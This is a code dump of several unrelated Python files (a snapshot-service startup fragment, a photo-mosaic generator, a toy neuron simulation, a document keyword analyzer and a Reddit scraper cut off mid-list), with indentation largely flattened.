logger.error("\nFailed to parse configuration - %s\n" % traceback.format_exc())
state.status = StateStatus.down;
state.hasConfigurationError = True;
state.configurationErrorReason = "Failed to parse configuration - " + traceback.format_exc();
state.writeStatusJson();
sys.exit("\nFailed to parse configuration - %s\n" % traceback.format_exc())
if is_snapshots_delete == True:
            delete_all_snapshots_for_all_repositories(snapper);
sys.exit(0);
signal.signal(signal.SIGTERM, snapper.set_signal_handling)
signal.signal(signal.SIGINT, snapper.set_signal_handling)
process_thread = threading.Thread(target=snapper.start, name="process_thread")
process_thread.start()
state.status = StateStatus.up;
state.writeStatusJson();
while process_thread.is_alive():
time.sleep(1)
process_thread.join()
except Exception, err:
state.status = StateStatus.down;
state.hasRuntimeError = True;
state.configurationErrorReason = "Failed to start with exception: " + traceback.format_exc();
state.writeStatusJson();
sys.exit("\nFailed to start - %s\n" % traceback.format_exc())
|
mosaic.py
|
import sys
import os, os.path
from PIL import Image, ImageOps
from multiprocessing import Process, Queue, cpu_count
# Change these 3 config parameters to suit your needs...
TILE_SIZE = 50 # height/width of mosaic tiles in pixels
TILE_MATCH_RES = 5 # tile matching resolution (higher values give better fit but require more processing)
ENLARGEMENT = 8 # the mosaic image will be this many times wider and taller than the original
TILE_BLOCK_SIZE = TILE_SIZE / max(min(TILE_MATCH_RES, TILE_SIZE), 1)
WORKER_COUNT = max(cpu_count() - 1, 1)
OUT_FILE = 'mosaic.jpeg'
EOQ_VALUE = None
class TileProcessor:
def __init__(self, tiles_directory):
self.tiles_directory = tiles_directory
def __process_tile(self, tile_path):
try:
img = Image.open(tile_path)
img = ImageOps.exif_transpose(img)
# tiles must be square, so get the largest square that fits inside the image
w = img.size[0]
h = img.size[1]
min_dimension = min(w, h)
w_crop = (w - min_dimension) / 2
h_crop = (h - min_dimension) / 2
img = img.crop((w_crop, h_crop, w - w_crop, h - h_crop))
large_tile_img = img.resize((TILE_SIZE, TILE_SIZE), Image.ANTIALIAS)
small_tile_img = img.resize((int(TILE_SIZE/TILE_BLOCK_SIZE), int(TILE_SIZE/TILE_BLOCK_SIZE)), Image.ANTIALIAS)
return (large_tile_img.convert('RGB'), small_tile_img.convert('RGB'))
except:
return (None, None)
def get_tiles(self):
large_tiles = []
small_tiles = []
print('Reading tiles from {}...'.format(self.tiles_directory))
# search the tiles directory recursively
for root, subFolders, files in os.walk(self.tiles_directory):
for tile_name in files:
print('Reading {:40.40}'.format(tile_name), flush=True, end='\r')
tile_path = os.path.join(root, tile_name)
large_tile, small_tile = self.__process_tile(tile_path)
if large_tile:
large_tiles.append(large_tile)
small_tiles.append(small_tile)
print('Processed {} tiles.'.format(len(large_tiles)))
return (large_tiles, small_tiles)
class TargetImage:
def __init__(self, image_path):
self.image_path = image_path
def get_data(self):
print('Processing main image...')
img = Image.open(self.image_path)
w = img.size[0] * ENLARGEMENT
h = img.size[1] * ENLARGEMENT
large_img = img.resize((w, h), Image.ANTIALIAS)
w_diff = (w % TILE_SIZE)/2
h_diff = (h % TILE_SIZE)/2
# if necessary, crop the image slightly so we use a whole number of tiles horizontally and vertically
if w_diff or h_diff:
large_img = large_img.crop((w_diff, h_diff, w - w_diff, h - h_diff))
small_img = large_img.resize((int(w/TILE_BLOCK_SIZE), int(h/TILE_BLOCK_SIZE)), Image.ANTIALIAS)
image_data = (large_img.convert('RGB'), small_img.convert('RGB'))
print('Main image processed.')
return image_data
class TileFitter:
def __init__(self, tiles_data):
self.tiles_data = tiles_data
def __get_tile_diff(self, t1, t2, bail_out_value):
diff = 0
for i in range(len(t1)):
#diff += (abs(t1[i][0] - t2[i][0]) + abs(t1[i][1] - t2[i][1]) + abs(t1[i][2] - t2[i][2]))
diff += ((t1[i][0] - t2[i][0])**2 + (t1[i][1] - t2[i][1])**2 + (t1[i][2] - t2[i][2])**2)
if diff > bail_out_value:
# we know already that this isn't going to be the best fit, so no point continuing with this tile
return diff
return diff
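    # Editor's note (hedged): the diff is a summed squared RGB distance; e.g. two
    # one-pixel tiles (10, 20, 30) and (13, 24, 30) differ by 3**2 + 4**2 + 0**2 = 25.
    # bail_out_value lets the loop stop early once a tile can no longer beat the
    # current best match.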
def get_best_fit_tile(self, img_data):
best_fit_tile_index = None
min_diff = sys.maxsize
tile_index = 0
# go through each tile in turn looking for the best match for the part of the image represented by 'img_data'
for tile_data in self.tiles_data:
diff = self.__get_tile_diff(img_data, tile_data, min_diff)
if diff < min_diff:
min_diff = diff
best_fit_tile_index = tile_index
tile_index += 1
return best_fit_tile_index
def fit_tiles(work_queue, result_queue, tiles_data):
# this function gets run by the worker processes, one on each CPU core
tile_fitter = TileFitter(tiles_data)
while True:
try:
img_data, img_coords = work_queue.get(True)
if img_data == EOQ_VALUE:
break
tile_index = tile_fitter.get_best_fit_tile(img_data)
result_queue.put((img_coords, tile_index))
except KeyboardInterrupt:
pass
# let the result handler know that this worker has finished everything
result_queue.put((EOQ_VALUE, EOQ_VALUE))
class ProgressCounter:
def __init__(self, total):
self.total = total
self.counter = 0
def update(self):
self.counter += 1
print("Progress: {:04.1f}%".format(100 * self.counter / self.total), flush=True, end='\r')
class MosaicImage:
def __init__(self, original_img):
self.image = Image.new(original_img.mode, original_img.size)
self.x_tile_count = int(original_img.size[0] / TILE_SIZE)
self.y_tile_count = int(original_img.size[1] / TILE_SIZE)
self.total_tiles = self.x_tile_count * self.y_tile_count
def add_tile(self, tile_data, coords):
img = Image.new('RGB', (TILE_SIZE, TILE_SIZE))
img.putdata(tile_data)
self.image.paste(img, coords)
def save(self, path):
self.image.save(path)
def build_mosaic(result_queue, all_tile_data_large, original_img_large):
mosaic = MosaicImage(original_img_large)
active_workers = WORKER_COUNT
while True:
try:
img_coords, best_fit_tile_index = result_queue.get()
if img_coords == EOQ_VALUE:
active_workers -= 1
if not active_workers:
break
else:
tile_data = all_tile_data_large[best_fit_tile_index]
mosaic.add_tile(tile_data, img_coords)
except KeyboardInterrupt:
pass
mosaic.save(OUT_FILE)
print('\nFinished, output is in', OUT_FILE)
def compose(original_img, tiles):
print('Building mosaic, press Ctrl-C to abort...')
original_img_large, original_img_small = original_img
tiles_large, tiles_small = tiles
mosaic = MosaicImage(original_img_large)
all_tile_data_large = [list(tile.getdata()) for tile in tiles_large]
all_tile_data_small = [list(tile.getdata()) for tile in tiles_small]
work_queue = Queue(WORKER_COUNT)
result_queue = Queue()
try:
# start the worker processes that will build the mosaic image
Process(target=build_mosaic, args=(result_queue, all_tile_data_large, original_img_large)).start()
# start the worker processes that will perform the tile fitting
for n in range(WORKER_COUNT):
Process(target=fit_tiles, args=(work_queue, result_queue, all_tile_data_small)).start()
progress = ProgressCounter(mosaic.x_tile_count * mosaic.y_tile_count)
for x in range(mosaic.x_tile_count):
for y in range(mosaic.y_tile_count):
large_box = (x * TILE_SIZE, y * TILE_SIZE, (x + 1) * TILE_SIZE, (y + 1) * TILE_SIZE)
small_box = (x * TILE_SIZE/TILE_BLOCK_SIZE, y * TILE_SIZE/TILE_BLOCK_SIZE, (x + 1) * TILE_SIZE/TILE_BLOCK_SIZE, (y + 1) * TILE_SIZE/TILE_BLOCK_SIZE)
work_queue.put((list(original_img_small.crop(small_box).getdata()), large_box))
progress.update()
except KeyboardInterrupt:
print('\nHalting, saving partial image please wait...')
finally:
# put these special values onto the queue to let the workers know they can terminate
for n in range(WORKER_COUNT):
work_queue.put((EOQ_VALUE, EOQ_VALUE))
def show_error(msg):
print('ERROR: {}'.format(msg))
def mosaic(img_path, tiles_path):
image_data = TargetImage(img_path).get_data()
tiles_data = TileProcessor(tiles_path).get_tiles()
if tiles_data[0]:
compose(image_data, tiles_data)
else:
show_error("No images found in tiles directory '{}'".format(tiles_path))
if __name__ == '__main__':
if len(sys.argv) < 3:
show_error('Usage: {} <image> <tiles directory>\r'.format(sys.argv[0]))
else:
source_image = sys.argv[1]
tile_dir = sys.argv[2]
if not os.path.isfile(source_image):
show_error("Unable to find image file '{}'".format(source_image))
elif not os.path.isdir(tile_dir):
show_error("Unable to find tile directory '{}'".format(tile_dir))
else:
mosaic(source_image, tile_dir)
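# Editor's note (hedged): example invocation; the image and tile directory are
# illustrative. The result is written to mosaic.jpeg (OUT_FILE) in the current
# working directory.
#
#   python mosaic.py portrait.jpg ./tile_photos/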
|
neuron.py
|
import random
import itertools
import time
import signal
from threading import Thread
from multiprocessing import Pool
import multiprocessing
POTENTIAL_RANGE = 110000 # Resting potential: -70 mV Membrane potential range: +40 mV to -70 mV --- Difference: 110 mV = 110000 microVolt --- https://en.wikipedia.org/wiki/Membrane_potential
ACTION_POTENTIAL = 15000 # Resting potential: -70 mV Action potential: -55 mV --- Difference: 15mV = 15000 microVolt --- https://faculty.washington.edu/chudler/ap.html
AVERAGE_SYNAPSES_PER_NEURON = 8200 # The average number of synapses per neuron: 8,200 --- http://www.ncbi.nlm.nih.gov/pubmed/2778101
# https://en.wikipedia.org/wiki/Neuron
class Neuron():
neurons = []
def __init__(self):
self.connections = {}
self.potential = 0.0
self.error = 0.0
#self.create_connections()
#self.create_axon_terminals()
Neuron.neurons.append(self)
self.thread = Thread(target = self.activate)
#self.thread.start()
#self.process = multiprocessing.Process(target=self.activate)
def fully_connect(self):
for neuron in Neuron.neurons[len(self.connections):]:
if id(neuron) != id(self):
self.connections[id(neuron)] = round(random.uniform(0.1, 1.0), 2)
def partially_connect(self):
if len(self.connections) == 0:
neuron_count = len(Neuron.neurons)
#for neuron in Neuron.neurons:
elected = random.sample(Neuron.neurons,100)
for neuron in elected:
if id(neuron) != id(self):
#if random.randint(1,neuron_count/100) == 1:
self.connections[id(neuron)] = round(random.uniform(0.1, 1.0), 2)
print "Neuron ID: " + str(id(self))
print " Potential: " + str(self.potential)
print " Error: " + str(self.error)
print " Connections: " + str(len(self.connections))
def activate(self):
while True:
'''
for dendritic_spine in self.connections:
if dendritic_spine.axon_terminal is not None:
dendritic_spine.potential = dendritic_spine.axon_terminal.potential
print dendritic_spine.potential
self.neuron_potential += dendritic_spine.potential * dendritic_spine.excitement
terminal_potential = self.neuron_potential / len(self.axon_terminals)
for axon_terminal in self.axon_terminals:
axon_terminal.potential = terminal_potential
'''
#if len(self.connections) == 0:
# self.partially_connect()
#else:
self.partially_connect()
pass
'''
if abs(len(Neuron.neurons) - len(self.connections) + 1) > 0:
self.create_connections()
if abs(len(Neuron.neurons) - len(self.axon_terminals) + 1) > 0:
self.create_axon_terminals()
'''
class Supercluster():
def __init__(self,size):
for i in range(size):
Neuron()
print str(size) + " neurons created."
self.n = 0
self.build_connections()
#pool = Pool(4, self.init_worker)
#pool.apply_async(self.build_connections(), arguments)
#map(lambda x: x.partially_connect(),Neuron.neurons)
#map(lambda x: x.create_connections(),Neuron.neurons)
#map(lambda x: x.create_axon_terminals(),Neuron.neurons)
def build_connections(self):
for neuron in Neuron.neurons:
self.n += 1
#neuron.thread.start()
neuron.partially_connect()
print "Counter: " + str(self.n)
Supercluster(100000)
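# Editor's note (hedged): Supercluster(100000) above creates 100,000 neurons and
# has each one sample 100 random peers via partially_connect(), i.e. roughly
# 10 million weighted connections in total. For a quick smoke test a much
# smaller cluster, e.g. Supercluster(1000), keeps the run time manageable
# (random.sample still needs at least 100 neurons to pick from).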
|
analyze_document_controller.py
|
from datetime import timedelta
from flashtext import KeywordProcessor
from intent_parser.intent_parser_exceptions import IntentParserException
import intent_parser.utils.intent_parser_utils as ip_utils
import logging
import os
import threading
import time
class AnalyzeDocumentController(object):
LOGGER = logging.getLogger('analyze_document_controller')
SYNC_PERIOD = timedelta(minutes=30)
ANALYZE_IGNORE_TERMS_FILE = os.path.join(os.path.dirname(os.path.realpath(__file__)),
'analyze_ignore_terms.json')
    def __init__(self):
        self._ignore_terms = {}
        self.analyzed_documents = {}
        self._started = False
        self._stop_event = threading.Event()
        self._analyze_processing_lock = threading.Lock()
        self._analyze_thread = threading.Thread(target=self._periodically_write_user_ignored_terms)
def start_analyze_controller(self):
self.LOGGER.info('Fetching ignored terms from file.')
self._analyze_processing_lock.acquire()
ignore_terms = ip_utils.load_json_file(self.ANALYZE_IGNORE_TERMS_FILE)
self._ignore_terms = ignore_terms
self._analyze_processing_lock.release()
self._started = True
self._analyze_thread.start()
    def stop_synchronizing_ignored_terms(self):
        self._analyze_processing_lock.acquire()
        self._write_ignored_terms()
        self._analyze_processing_lock.release()
        self._started = False
        self._stop_event.set()  # wake the background thread so join() returns promptly
        self._analyze_thread.join()
    def _periodically_write_user_ignored_terms(self):
        # Sleep in SYNC_PERIOD chunks, but exit as soon as the stop event is set.
        while not self._stop_event.wait(self.SYNC_PERIOD.total_seconds()):
            self._write_ignored_terms()
def _write_ignored_terms(self):
self.LOGGER.info('Writing ignored terms to file.')
ip_utils.write_json_to_file(self._ignore_terms, self.ANALYZE_IGNORE_TERMS_FILE)
def get_all_analyzed_results(self, document_id):
if document_id not in self.analyzed_documents:
return None
analyze_document = self.analyzed_documents[document_id]
return analyze_document.get_result()
def get_first_analyze_result(self, document_id):
if document_id not in self.analyzed_documents:
return None
analyze_document = self.analyzed_documents[document_id]
results = analyze_document.get_result()
if len(results) == 0:
self.analyzed_documents.pop(document_id)
return None
return results[0]
def add_to_ignore_terms(self, user_id, term):
self._analyze_processing_lock.acquire()
if user_id not in self._ignore_terms:
self._ignore_terms[user_id] = [term]
else:
user_ignored_terms = self._ignore_terms[user_id]
if term not in user_ignored_terms:
user_ignored_terms.append(term)
self._analyze_processing_lock.release()
def remove_analyze_result_with_term(self, document_id, matching_term):
if document_id not in self.analyzed_documents:
return
analyze_document = self.analyzed_documents[document_id]
return analyze_document.remove_all(matching_term)
def remove_document(self, document_id):
if document_id not in self.analyzed_documents:
return
self.analyzed_documents.pop(document_id)
def remove_analyze_result(self, document_id, paragraph_index, matching_term, sbh_uri, start_offset, end_offset):
if document_id not in self.analyzed_documents:
return
analyze_document = self.analyzed_documents[document_id]
analyze_document.remove_first_occurrence(paragraph_index, matching_term, sbh_uri, start_offset, end_offset)
def process_dictionary_terms(self, document_id, ip_document, user_id, doc_location, dictionary_terms={}):
if not self._started:
raise IntentParserException('AnalyzeDocumentController was not initialized to load ignored terms from file.')
filtered_dictionary = self._filter_dictionary_terms(user_id, dictionary_terms)
analyze_document = self._get_or_create_analyze_document(document_id, ip_document, filtered_dictionary)
analyze_document.analyze(doc_location)
def _get_or_create_analyze_document(self, document_id, ip_document, dictionary_terms={}):
analyze_document = None
self._analyze_processing_lock.acquire()
if document_id in self.analyzed_documents:
analyze_document = self.analyzed_documents[document_id]
else:
analyze_document = _AnalyzeDocument(document_id, ip_document, dictionary_terms)
self.analyzed_documents[document_id] = analyze_document
self._analyze_processing_lock.release()
return analyze_document
def _filter_dictionary_terms(self, user_id, dictionary_terms):
self._analyze_processing_lock.acquire()
copied_dictionary = dictionary_terms.copy()
if user_id in self._ignore_terms:
for term in self._ignore_terms[user_id]:
if term in copied_dictionary:
copied_dictionary.pop(term)
self._analyze_processing_lock.release()
return copied_dictionary
class AnalyzeResult(object):
def __init__(self, paragraph_index, matching_term, sbh_uri, start_offset, end_offset):
self.paragraph_index = paragraph_index
self.matching_term = matching_term
self.sbh_uri = sbh_uri
self.start_offset = start_offset
self.end_offset = end_offset
def get_paragraph_index(self):
return self.paragraph_index
def get_matching_term(self):
return self.matching_term
def get_sbh_uri(self):
return self.sbh_uri
def get_start_offset(self):
return self.start_offset
def get_end_offset(self):
return self.end_offset
class _AnalyzeDocument(object):
def __init__(self, document_id, ip_document, dictionary_terms):
self.document_id = document_id
self.ip_document = ip_document
self.dictionary_terms = dictionary_terms
self.keyword_processor = KeywordProcessor()
self.keyword_processor.add_keywords_from_list(list(dictionary_terms.keys()))
self.result = []
def analyze(self, doc_location):
for ip_paragraph in self.ip_document.get_paragraphs():
if ip_paragraph.get_paragraph_index() < doc_location.get_paragraph_index():
continue
text = ip_paragraph.get_text()
match_results = self.keyword_processor.extract_keywords(text, span_info=True)
if not match_results:
continue
for match, start, end in match_results:
if doc_location.get_paragraph_index() == ip_paragraph.get_paragraph_index():
if start < doc_location.get_start_offset():
continue
sbh_uri = self.dictionary_terms[match]
analyze_result = AnalyzeResult(ip_paragraph.get_paragraph_index(),
match,
sbh_uri,
start,
end-1)
self.result.append(analyze_result)
def remove_first_occurrence(self, paragraph_index, matching_term, sbh_uri, start_offset, end_offset):
for index in reversed(range(len(self.result))):
analyze_result = self.result[index]
# if users want to manually enter in a sbh_uri then allow users to remove current result
# as long as the term and position where the term occurs in the document matches.
if (analyze_result.get_paragraph_index() == paragraph_index
and analyze_result.get_matching_term() == matching_term
and analyze_result.get_start_offset() == start_offset
and analyze_result.get_end_offset() == end_offset):
self.result.pop(index)
return True
return False
def remove_all(self, term):
removed_item = []
for index in reversed(range(len(self.result))):
analyze_result = self.result[index]
if analyze_result.get_matching_term() == term:
self.result.pop(index)
removed_item.append(analyze_result)
return removed_item
def get_result(self):
return self.result
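# --- Illustrative sketch, not part of the original module ---
# _AnalyzeDocument.analyze() relies on flashtext's span-aware keyword matching:
# extract_keywords(text, span_info=True) yields (term, start, end) tuples. The
# helper below shows only that pattern; the example term and URI are made-up
# placeholders, not entries from any real dictionary.
def _demo_keyword_spans():
    """Return (term, sbh_uri, start, end) tuples found in a sample sentence."""
    dictionary_terms = {'plasmid': 'https://example.org/plasmid'}  # hypothetical
    processor = KeywordProcessor()
    processor.add_keywords_from_list(list(dictionary_terms.keys()))
    text = 'Insert the plasmid into the host strain.'
    matches = processor.extract_keywords(text, span_info=True)
    return [(term, dictionary_terms[term], start, end) for term, start, end in matches]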
|
worldnews1.py
|
import re
from bs4 import BeautifulSoup
from bs4 import SoupStrainer
import os
import httplib2
from multiprocessing import Pool
c=0
import requests
from datetime import datetime
import multiprocessing
from multiprocessing import current_process
import time
import os
import sys
FORMAT = '%d-%m-%Y %H:%M:%S'
my=open('log.txt','a',encoding='utf-8')
def make_soup2(url):
match=re.compile('https://|http://|www.|.com|.in|.org|gov.in')
my.write('\nnot stuck1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
if re.search(match,url):
while(True):
try:
r = requests.get(url, timeout=5) #number of seconds to wait for response before throwing exception
break
except:
print("timed out")
continue
        page = BeautifulSoup(r.text, "html.parser", parse_only=SoupStrainer('div'))
return page
else:
return None
def make_soup1(url):
match=re.compile('https://|http://|www.|.com|.in|.org|gov.in')
my.write('\nnot stuck1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
if re.search(match,url):
while(True):
try:
try:
r = requests.get(url, timeout=5) #number of seconds to wait for response before throwing exception
my.write('\nnot stuck2'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
                    page = BeautifulSoup(r.text, "html.parser", parse_only=SoupStrainer('div'))
my.write('\nnot stuck3'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
break
except requests.exceptions.Timeout:
print("timed out")
except:
continue
return page
else:
return None
def make_soup(s):
match=re.compile('https://|http://|www.|.com|.in|.org|gov.in')
#my.write(s)
if re.search(match,s):
while(True):
try:
http = httplib2.Http()
#my.write('\nnot stuck1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
break
except:
#print('stuck1')
continue
while(True):
try:
status, response = http.request(s)
#my.write('\nnot stuck2'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
break
except:
#print('stuck2')
continue
while(True):
try:
page = BeautifulSoup(response,"html.parser",parse_only=SoupStrainer('div'))
#my.write('\nnot stuck3'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
break
except:
#print('stuck3')
continue
return page
else:
return None
def test_internet():
#my.write('\nin test_internet'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
while(True):
try:
http = httplib2.Http()
status, response = http.request("https://www.google.com")
#my.write('\nSUCCESS test_internet'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
break
except:
continue
def parse1(s):
#my.write('\nin parse'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
global c
temp_set=set()
soup=make_soup(s)
if(soup!=None):
for div in soup.find_all('div',class_=[ "thing" , "id-t3_3ua12m" ,"linkflair" , "linkflair-normal" , "odd" , "link"]):
try:
if(div.p!=None and div.p.next_sibling!=None and div.p.next_sibling.next_sibling!=None):
x=div.p.next_sibling.next_sibling.next_sibling['class']
#print(x)
if(x[0]=='entry'):
element='\nPROMPT '+str(c+1)+'\n'
if(div.p.next_sibling.next_sibling.next_sibling!=None and div.p.next_sibling.next_sibling.next_sibling.p!=None and div.p.next_sibling.next_sibling.next_sibling.p.a!=None):
element=element+div.p.next_sibling.next_sibling.next_sibling.p.a.string+'\n'
element=element+div.p.next_sibling.next_sibling.next_sibling.p.a['href']+'\n'
if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time!=None):
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['datetime']+'\t'
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time['title']+'\t'
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).time.string+'\n'
if(div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'})!=None and div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a!=None):
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).a.string+'\n'
element=element+div.p.next_sibling.next_sibling.next_sibling.find('p',{'class':'tagline'}).text+'\n'
if(div.div.find('div',{'class':'score likes'})!=None):
element=element+'score likes '+div.div.find('div',{'class':'score likes'}).string+'\t'
element=element+'score dislikes '+div.div.find('div',{'class':'score dislikes'}).string+'\t'
element=element+'score unvoted '+div.div.find('div',{'class':'score unvoted'}).string+'\n\n'
f.write(element)
c=c+1
elif(x[0]=='thumbnail'):
element='\nPROMPT '+str(c+1)+'\n'
if(div.find('div',{'class':'entry unvoted'})!=None and div.find('div',{'class':'entry unvoted'}).p!=None and div.find('div',{'class':'entry unvoted'}).p.a!=None and div.find('div',{'class':'entry unvoted'}).p.a.string!=None):
element=element+div.find('div',{'class':'entry unvoted'}).p.a.string+'\n'
element=element+div.find('div',{'class':'entry unvoted'}).p.a['href']+'\n'
if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'})!=None and div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time != None):
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['datetime']+'\t'
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time['title']+'\t'
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).time.string+'\n'
if(div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a!=None):
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).a.string+'\n'
element=element+div.find('div',{'class':'entry unvoted'}).find('p',{'class':'tagline'}).text+'\n'
if(div.p.next_sibling.next_sibling.find('div',{'class':'score likes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'})!=None and div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'})!=None):
element=element+'score likes '+div.p.next_sibling.next_sibling.find('div',{'class':'score likes'}).string+'\t\t'
element=element+'score dislikes '+div.p.next_sibling.next_sibling.find('div',{'class':'score dislikes'}).string+'\t\t'
element=element+'score unvoted '+div.p.next_sibling.next_sibling.find('div',{'class':'score unvoted'}).string+'\n'
#my.write('\nSUCCESS PARSE 1'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
f.write(element)
c=c+1
except:
my.write('ERROR'+datetime.now().strftime(FORMAT)+'\n')
continue
def count_next_of_current(s,m):
#my.write('\nin count_next_of current'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
soup=make_soup(s)
y='https://www.reddit.com/r/'+m+'/'+select_tab+'/?count='
match=re.compile(y)
for link in soup.find_all('a',{'rel':['next']}):
href=link['href']
#my.write('\nSUCCESS count_next_of current'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
return href
def read_reddit_images(change_file_number,m,x):
#my.write('\nin read_reddit_images'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
global f
global select_tab
select_tab=x
x=m+'_'+select_tab+'.txt'
#test_internet()
s='https://www.reddit.com/r/'+m+'/'+select_tab
soup=make_soup(s)
f=open(x,'a',encoding='utf-8')
f.write('\n\n\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n')
maximum_number_of_next_pages=5
parse1(s)
count=0
print('for '+m+' '+select_tab+' current page number is'+'\n'+str(count))
while(count<maximum_number_of_next_pages):
#test_internet()
s=count_next_of_current(s,m)
if(s!=None):
parse1(s)
count=count+1
print(count)
else:
break
f.write('\n\niteration number '+str(change_file_number)+' '+datetime.now().strftime(FORMAT)+'\n\n')
f.close()
#my.write('\nSUCCESS read_reddit_images'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
def main(m,i):
#my.write('\nin maincall'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
my.write('\n'+str(type(m))+' '+m+' '+str(type(i))+' '+str(i)+'\n')
read_reddit_images(i,m,'new')
read_reddit_images(i,m,'hot')
read_reddit_images(i,m,'top')
#read_reddit_images(i,m,'rising')
#read_reddit_images(i,m,'controversial')
#read_reddit_images(i,m,'gilded')
my.write('\n'+str(type(m))+' '+m+' '+str(type(i))+' '+str(i)+' SUCCESS SUCCESS SUCCESS\n')
#my.write('\nSUCCESS maincall'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
def subs(b):
my.write('\nin subs'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
test_internet()
t=open("mytext.txt",'r')
i=t.read()
temp=int(i)
temp=temp+1
t.close()
t=open("mytext.txt",'w')
t.write(str(temp))
t.close()
for k in b:
        main(k, i)
my.write('\nSUCCESS subs'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n\n')
def list_subreddits():
my.write('\nin list_subreddits'+'-------------------------'+datetime.now().strftime(FORMAT)+'\n')
test_internet()
b=[]
b=b+['buildapc','offmychest','datamining','DebateReligion','DecidingToBeBetter','depression','ECE','Economics','eebooks','electronics','Feminism','findareddit']
b=b+['PoliticalDiscussion','books','shittyaskscience','AskScienceFiction','linux','ProgrammerHumor','holdmybeer','socialism','InternetIsBeautiful','changemyview']
b=b+['AskScienceDiscussion','AskSocialScience','askphotography','badcode','bestofTLDR','biology','bookquotes','bugs','C_Programming','chipdesign','coding']
b=b+['compilers','complexsystems','compression','computerforensics','computers','computerscience','cosmology','coursearea','Cplusplus','cpp','CppForbeginners']
b=b+['CrappyDesign','CrazyIdeas','crypto','cryptography','cs50','csbooks','cscareerquestions','dailyprogrammer','dailyscripts','darkinternet','dataisbeautiful']
b=b+['relationships','showerthoughts','explainlikeimfive','technology','science','music','india','conspiracy','talesfromtechsupport','sex','AskWomen']
b=b+['24hoursupport','3amjokes','AcademicPhilosophy','AcademicPsychology','AMA','AndroidQuestions','Android','androiddev','Anger','answers','Anxiety']
b=b+['Ask_Politics','AskAnthropology','AskComputerScience','AskElectronics','AskEngineers','AskHistorians','asklinguistics','askmath','AskMen','AskPhysics']
b=b+['askscience','writingprompts','DIY','LifeProTips','bodybuilding','GetMotivated','TrueReddit','teenagers','AskHistorians','programming','NoStupidQuestions']
b=b+['Foodforthought','illegaltorrents','improvevocab','intel','intelligence','interview','iWantToLearn','java','javacodegeeks','javahelp','javascript','javaTIL']
b=b+['Freethought','getdisciplined','GetStudying','goldredditsays','grammar','GraphicsProgramming','hacking','HomeworkHelp','humanism','ideasfortheadmins']
b=b+['learnjava','learnmath','learnjavascript','linux','linux4noobs','linuxquestions','literature','logic','MachineLearning','math','mathbooks','MathHelp']
b=b+['meditation','mysql','networking','Neuropsychology','obvious','opengl','osdev','perl','philosophy','philosophyofScience','privacy','productivity']
b=b+['programmingchallenges','PhsychologicalTricks','puzzles','Python','quotes','rage','rational','riddles','selfimprovement','shittyideas','shittyprogramming']
b=b+['socialskills','software','softwarearchitecture','softwaredevelopment','softwaregore','sysadmin','systems','talesfromtechsupport','techsupport','bestof']
b=b+['worldnews','lifehacks','AskHistorians','programming','politics','compsci','javahelp','learnprogramming','cpp_questions','physics','writingprompts']
b=b+['getmotivated','news','gadgets','InternetIsBeautiful','india','science','IAmA','askscience','jokes','explainlikeimfive','technology','showerthoughts']
b=b+['movies','documentaries','dataisbeautiful','history','AskReddit','funny','todayilearned','pics','books','space','philosophy','learnpython','askscience']
b=b+['TrueAskReddit','Web_Development','webdev','worldnews','news','askreddit','learnprogramming','compsci']#major list, Once a week
b=[]
b=['24hoursupport','3amjokes','ADHD','AMA','AcademicPhilosophy','AcademicPsychology','Aerospace','Android','AndroidQuestions','Anger','Anxiety',
'AskAnthropology','AskComputerScience','AskElectronics','AskEngineers','AskHR','AskHistorians','AskMen','AskPhysics','AskReddit','AskScienceDiscussion',
'AskScienceFiction','AskSocialScience','AskWomen','Ask_Politics','Bash','BehavioralEconomics','BigDataJobs','BipolarReddit','CAD','C_Programming',
'ComputerScience','Confession','CoverTheWorld','Cplusplus','CppForbeginners','CrappyDesign','CrazyIdeas','DIY','DIYCompSci','DailyProgrammer','DeadBedrooms',
'DebateReligion','DecidingToBeBetter','DigitalNomad','DoesNotTranslate','ECE','Economics','EngineeringStudents','Entrepreneur','ExNoContact','FEA','FE_Exam',
'Feminism','FluidMechanics','Foodforthought','FoundWords','Freethought','GetMotivated','GetStudying','GraphicsProgramming','HITsWorthTurkingFor','HTMLBattles',
'HomeworkHelp','HowsYourJob','IAmA','IOPsychology','InternetIsBeautiful','LaTeX','LanguageLearning','LearnANewLanguage','LearnJava','LearnJavaScript',
